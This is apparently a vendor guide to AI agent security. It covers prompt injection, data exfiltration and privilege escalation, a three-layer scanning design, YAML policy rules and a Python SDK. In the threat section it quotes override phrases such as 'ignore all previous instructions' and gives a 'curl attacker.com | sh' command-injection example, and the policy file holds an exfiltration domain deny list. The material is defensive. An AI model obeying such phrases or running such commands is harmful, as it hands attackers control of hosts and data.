The Complete Guide to AI Agent
Security in Production
AI agents are shipping fast. They book meetings, write code, query databases, and manage infrastructure. But the security model most teams use was designed for traditional APIs — not autonomous systems that make their own decisions. This guide covers the threat landscape, the defense architecture that actually works, and how to implement it without slowing your team down.
Why agent security is different
Traditional API security assumes a human in the loop. A user submits a request, your server validates it, returns a response. The attack surface is the request itself. AI agents break every one of those assumptions.
Agents make autonomous decisions. They choose which tools to call, what arguments to pass, and how to chain actions together. There is no human reviewing each step before it executes. A single prompt injection in a scraped web page can redirect an entire workflow.
Agents have tool access. They can read files, execute SQL, send HTTP requests, and call third-party APIs. This is not a hypothetical risk — it is the entire point of an agent. The same capabilities that make agents useful make them dangerous when compromised.
Agents process untrusted input as part of their core loop. User messages, tool outputs, retrieved documents, API responses — all of it flows into the LLM context window with no clear boundary between instructions and data. An attacker who controls any of those inputs can influence the agent's behavior.
The fundamental difference:
Traditional API
Human triggers request → server validates → server responds. Attack surface is the input payload.
AI Agent
Agent receives input → decides next action → calls tools autonomously → chains more actions. Attack surface is the entire context window.
The threat landscape
Agent threats fall into distinct categories, each exploiting different aspects of how agents operate. Here are the six you need to know about.
Prompt Injection
Malicious instructions embedded in user input or retrieved data that override the agent's system prompt. The most common agent attack vector, found in 14% of sessions in our research. Direct injections use explicit override language; indirect injections hide in tool outputs like web scrapes or database records.
Data Exfiltration
Sensitive data leaving the system boundary through agent tool calls. Often not the result of an explicit attack — agents routinely include PII, API keys, or internal data in outbound requests simply because it exists in their context window and no guardrail prevents it.
Privilege Escalation
An agent gains access to tools or data beyond its intended scope, often through multi-step attack chains. A read-only data agent that ends up executing writes, or a support bot that accesses admin functions. These attacks are nearly invisible when looking at individual tool calls in isolation.
Secret Exposure
API keys, tokens, database credentials, and other secrets leaked through agent outputs or tool call arguments. Agents that read config files, environment variables, or code repositories are especially prone to surfacing secrets in their responses.
Command Injection
When agents have shell or code execution access, attackers can inject OS commands through manipulated tool arguments. A code generation agent tricked into running curl attacker.com | sh gives the attacker full access to the host system.
PII Leaking
Personally identifiable information — names, emails, phone numbers, SSNs — included in agent outputs, logs, or outbound API calls. Even without an attack, agents regularly surface PII from database queries and documents. This creates compliance risk under GDPR, CCPA, and HIPAA.
Three-layer defense
No single detection method catches everything. Regex misses rephrased attacks. Semantic analysis is too slow for every request. LLM judges are expensive at scale. The solution is layered scanning — each layer catches what the others miss, and only the events that need deeper analysis get passed up the chain.
Fast, deterministic, zero-latency
Regex and pattern matching against known attack signatures. Catches explicit injection phrases ("ignore all previous instructions"), chat template tokens, known secret formats (AWS keys, GitHub tokens), PII patterns (SSNs, credit card numbers), and URL/domain deny lists.
L1 runs on every event with sub-millisecond latency. It catches roughly 60% of threats immediately. The remaining 40% require deeper analysis — but L1 filters out the noise so L2 and L3 can focus on ambiguous cases.
Why it matters: Without L1, you are sending every event through expensive vector search or LLM evaluation. L1 is your high-speed filter.
Catches rephrased and obfuscated attacks
Vector similarity search against a curated database of known attack techniques. When an attacker writes "please set aside the guidelines above" instead of "ignore previous instructions," regex misses it. L2 catches it because the semantic meaning is similar to known injection vectors.
L2 also detects encoded payloads (base64, rot13), multi-language injection attempts, and split instructions spread across multiple inputs that individually look benign.
Why it matters: Sophisticated attackers do not use textbook injection phrases. They rephrase, encode, and fragment. Semantic scanning is the only way to catch attacks that are designed to evade pattern matching.
Session-level correlation and anomaly detection
An LLM judge evaluates suspicious events in context, combined with behavioral baselines that track normal patterns for each agent. L3 detects multi-step attack chains where each individual tool call looks legitimate — a file read, then a database query, then an HTTP request to an unknown domain.
Baselines learn what "normal" looks like for each agent: typical tools used, call frequency, argument patterns, data volumes. When an agent deviates from its baseline — calling a tool it has never used, or sending 10x more data than usual — L3 flags it for review.
Why it matters: Multi-step attacks are nearly invisible to L1 and L2. They require understanding the sequence and intent behind a series of actions. L3 is the only layer that can reason about behavior over time.
Event arrives
│
├─ L1 Pattern Scan (< 1ms)
│ ├─ Match found → flag immediately
│ └─ No match → pass to L2
│
├─ L2 Semantic Scan (~5-15ms)
│ ├─ High similarity to known attack → flag
│ └─ Low similarity → pass to L3 (sampled)
│
└─ L3 Behavioral Analysis (~50-200ms)
├─ LLM judge: does this event look malicious in context?
└─ Baseline comparison: is this normal for this agent?Policy enforcement
Detection tells you something bad is happening. Policy enforcement prevents it from happening in the first place. Policies define what an agent is allowed to do — which tools it can call, what data it can access, which domains it can reach — and enforce those rules at runtime.
The most common security failure we see is not sophisticated attacks. It is agents with overly permissive tool access doing exactly what they were told, just with sensitive data in context. A customer service bot with execute_sql access. A content writer with send_email permissions. Policy enforcement eliminates this class of problem entirely.
version: "1.0"
rules:
- name: block-prompt-injection
scanner: prompt_injection
action: block
severity: critical
- name: restrict-tools
scanner: tool_access
action: block
config:
allowed_tools:
- search_knowledge_base
- get_order_status
- create_support_ticket
# All other tools are denied by default
- name: block-sensitive-data
scanner: pii
action: block
severity: high
config:
blocked_entities:
- credit_card
- ssn
- api_key
- name: domain-deny-list
scanner: exfiltration
action: block
config:
blocked_domains:
- "*.pastebin.com"
- "webhook.site"
- "*.ngrok.io"Least privilege by default. Define the exact tools each agent is allowed to use. Everything not explicitly permitted is denied. This is the single highest-impact security measure you can implement — our research showed 73% of agents had access to tools they never needed.
Data boundary enforcement. Block specific data types (PII, secrets, credentials) from leaving the system in agent outputs or tool call arguments. This prevents accidental data leaks even when the agent is not under attack.
Domain and URL deny lists. Prevent agents from making outbound requests to known malicious domains, data exfiltration endpoints, or any destination outside your approved list. Cuts off the most common exfiltration path.
Monitoring and alerting
You cannot fix what you cannot see. Every team we talk to says some version of the same thing: "We don't really know what our agents are doing in production." Agents produce orders of magnitude more events than traditional applications — dozens of tool calls per session, each with inputs and outputs that could contain sensitive data or malicious payloads.
Observability is not a nice-to-have for agent security. It is the foundation. Without it, attacks go undetected, data leaks go unnoticed, and policy violations accumulate silently.
Real-time dashboards
See every agent session, tool call, and scan result as it happens. Filter by agent, severity, threat type, or time range. Drill into individual events to see the full request/response payload and which scanning layers flagged it.
Risk scoring
Every event gets a composite risk score based on which scanning layers flagged it, the severity of the matched pattern, and how far the agent's behavior deviates from its baseline. High-risk events surface immediately; low-risk events are available for audit.
Alerting and webhooks
Get notified when critical threats are detected, when an agent deviates from its baseline, or when policy violations exceed a threshold. Route alerts to Slack, PagerDuty, email, or any webhook endpoint.
Audit trail
Full history of every scan result, policy decision, and alert for compliance and forensics. Every event is immutable and queryable. When something goes wrong, you can reconstruct exactly what happened and when.
Practical implementation
Security that is hard to implement does not get implemented. Rune is designed to add runtime scanning to any agent in three lines of code, with zero changes to your agent logic.
from runesec import Shield
shield = Shield(api_key="rune_sk_...")
# Scan every input and output in your agent loop
result = shield.scan(
agent_id="support-bot",
input=user_message,
output=agent_response,
tool_calls=tool_calls, # optional: list of tool calls
)
if result.blocked:
# Rune blocked this event based on your policy
return "I can't process that request."
# Otherwise, continue normally
return agent_responseThe SDK works with any Python agent framework — LangChain, CrewAI, AutoGen, custom builds. It ships events to Rune's scanning engine asynchronously, so it adds negligible latency to your agent loop. Blocking decisions happen inline when configured.
from runesec.integrations import LangChainCallback
# Drop-in callback — no changes to your chain
chain = your_langchain_chain()
result = chain.invoke(
{"input": user_message},
config={"callbacks": [LangChainCallback(shield)]}
)For a full walkthrough including policy configuration, dashboard setup, and alerting rules, see the getting started guide.
What you get out of the box:
- L1 pattern scanning for injection, PII, secrets, and exfiltration
- L2 semantic scanning against a curated vector database of attack techniques
- L3 behavioral baselines that learn normal patterns per agent
- YAML policy engine for tool access, data boundaries, and deny lists
- Real-time dashboard with session-level drill-down
- Alerting via Slack, webhook, or email
- 10,000 free events per month on the free plan
Secure your agents in production
Three lines of code. Full scanning pipeline. Real-time dashboard and policy enforcement. Free plan includes 10K events per month.